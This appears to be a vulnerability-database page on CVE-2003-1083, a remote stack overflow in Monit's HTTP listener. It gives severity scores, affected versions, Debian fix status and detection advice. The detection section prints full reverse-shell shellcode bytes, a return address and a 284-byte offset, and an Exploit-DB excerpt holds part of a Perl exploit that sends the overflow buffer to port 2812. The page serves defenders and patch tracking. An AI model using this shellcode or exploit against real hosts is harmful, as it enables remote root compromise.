CVE-2003-1083
published 2003-12-31CVE-2003-1083: Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
PriorityP355critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
21.11%
97.3th percentile
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | monit | < monit 1:4.2.1-1 (bookworm) | monit 1:4.2.1-1 (bookworm) |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | — | — |
| tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1 |
| tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1 |
| tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1 |
| tildeslash | monit | >= 0 < 1:4.2.1-1 | 1:4.2.1-1 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xcf\x89\xb3\x40
bytes↗
\x83\xC4\x40
bytes↗
\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x24
bytes↗
\xeb\x55\x5d\x6a\x06\x6a\x01\x6a\x02\x31\xc0\xb0\x61\x50\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x6a\x10\x50\x57\x31\xc0\xb0\x62\x50\xcd\x80\x72\x3b\x31\xc9\x51\x57\x31\xc0\xb0\x5a\x50\xcd\x80\x41\x80\xf9\x02\x77\x04\xeb\xef\xeb\x2e\x83\xec\x10\x8d\x44\x24\x08\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x8d\x14\x24\x89\xd1\x53\x51\x88\x5d\x07\x55\x31\xc0\xb0\x3b\x50\xcd\x80\x31\xc0\x50\xfe\xc0\x50\xcd\x80\xe8\x76\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x24
- →Monit's HTTP listener on TCP/2812 is the attack surface; monitor for oversized HTTP requests (>256 bytes of payload) sent to this port, particularly those containing NOP sleds (0x90 sequences) followed by shellcode. ↗
- →The exploit payload is terminated with a bare double newline (\n\n) rather than a well-formed HTTP request; detect HTTP traffic to port 2812 that lacks standard HTTP method/version headers but ends with \n\n. ↗
- →The reverse shellcode connects back to the attacker on a configurable port (default 31337); monitor for unexpected outbound TCP connections from the Monit process, especially to port 31337. ↗
- →The exploit buffer uses a fixed offset of 284 bytes before the return address overwrite; IDS signatures can match payloads to TCP/2812 containing 284+ repeated bytes followed by a 4-byte EIP value. ↗
- ·The return address used in exploit 1 (0x40b389cf) is specific to Mandrake 9.1 builds of Monit; the exploit for other distributions requires a different EIP value and offset, meaning signatures based solely on the hardcoded return address will miss cross-platform variants. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6p52-6mw3-w4wv: Stack-based buffer overflow in Monit 1
ghsa_unreviewed·2022-04-29
CVE-2003-1083 [HIGH] GHSA-6p52-6mw3-w4wv: Stack-based buffer overflow in Monit 1
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
OSV
CVE-2003-1083: Stack-based buffer overflow in Monit 1
osv·2003-12-31·CVSS 10.0
CVE-2003-1083 [CRITICAL] CVE-2003-1083: Stack-based buffer overflow in Monit 1
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
Debian
CVE-2003-1083: monit - Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execu...
vendor_debian·2003·CVSS 10.0
CVE-2003-1083 [CRITICAL] CVE-2003-1083: monit - Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execu...
Stack-based buffer overflow in Monit 1.4 to 4.1 allows remote attackers to execute arbitrary code via a long HTTP request.
Scope: local
bookworm: resolved (fixed in 1:4.2.1-1)
bullseye: resolved (fixed in 1:4.2.1-1)
forky: resolved (fixed in 1:4.2.1-1)
sid: resolved (fixed in 1:4.2.1-1)
trixie: resolved (fixed in 1:4.2.1-1)
No detection rules found.
Exploit-DB
Monit 4.1 - Remote Buffer Overflow
exploitdb·2004-04-09
CVE-2003-1083 Monit 4.1 - Remote Buffer Overflow
Monit 4.1 - Remote Buffer Overflow
---
#!/usr/bin/perl
#
# monit \n\n";
exit(0);
}
print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";
my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug
print "connecting to server...\n";
$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
PeerPort => 2812,
Proto => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}
print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;
close $socket;
print "\ndosed!\n";
# milw0rm.com [2004-04-09]
Exploit-DB
Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
exploitdb·2003-11-24
CVE-2003-1083 Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
Monit 1.4/2.x/3/4 - 'HTTP Request' Buffer Overrun
---
source: https://www.securityfocus.com/bid/9099/info
A buffer overrun vulnerability has been discovered in Monit 4.1 and earlier that could be exploited remotely to gain root privileges. The problem occurs due to insufficient bounds checking when handling overly long HTTP requests. As a result, it may be possible for a remote attacker to corrupt sensitive process data in such a way that the execution flow of Monit can be controlled.
Successful exploitation of this condition could potentially allow for the execution of arbitrary code with root privileges.
// Michel, http://www.cycom.se
#!/usr/bin/perl
#
# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)
# (C) 2004 by Shadowinteger
#
# Verbatim copying, distribution and/o
No writeups or analysis indexed.
http://secunia.com/advisories/10280http://security.gentoo.org/glsa/glsa-200403-14.xmlhttp://www.kb.cert.org/vuls/id/623854http://www.securityfocus.com/archive/1/345417http://www.securityfocus.com/bid/9099http://www.tildeslash.com/monit/dist/CHANGES.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/13817http://secunia.com/advisories/10280http://security.gentoo.org/glsa/glsa-200403-14.xmlhttp://www.kb.cert.org/vuls/id/623854http://www.securityfocus.com/archive/1/345417http://www.securityfocus.com/bid/9099http://www.tildeslash.com/monit/dist/CHANGES.txthttps://exchange.xforce.ibmcloud.com/vulnerabilities/13817
2003-12-31
Published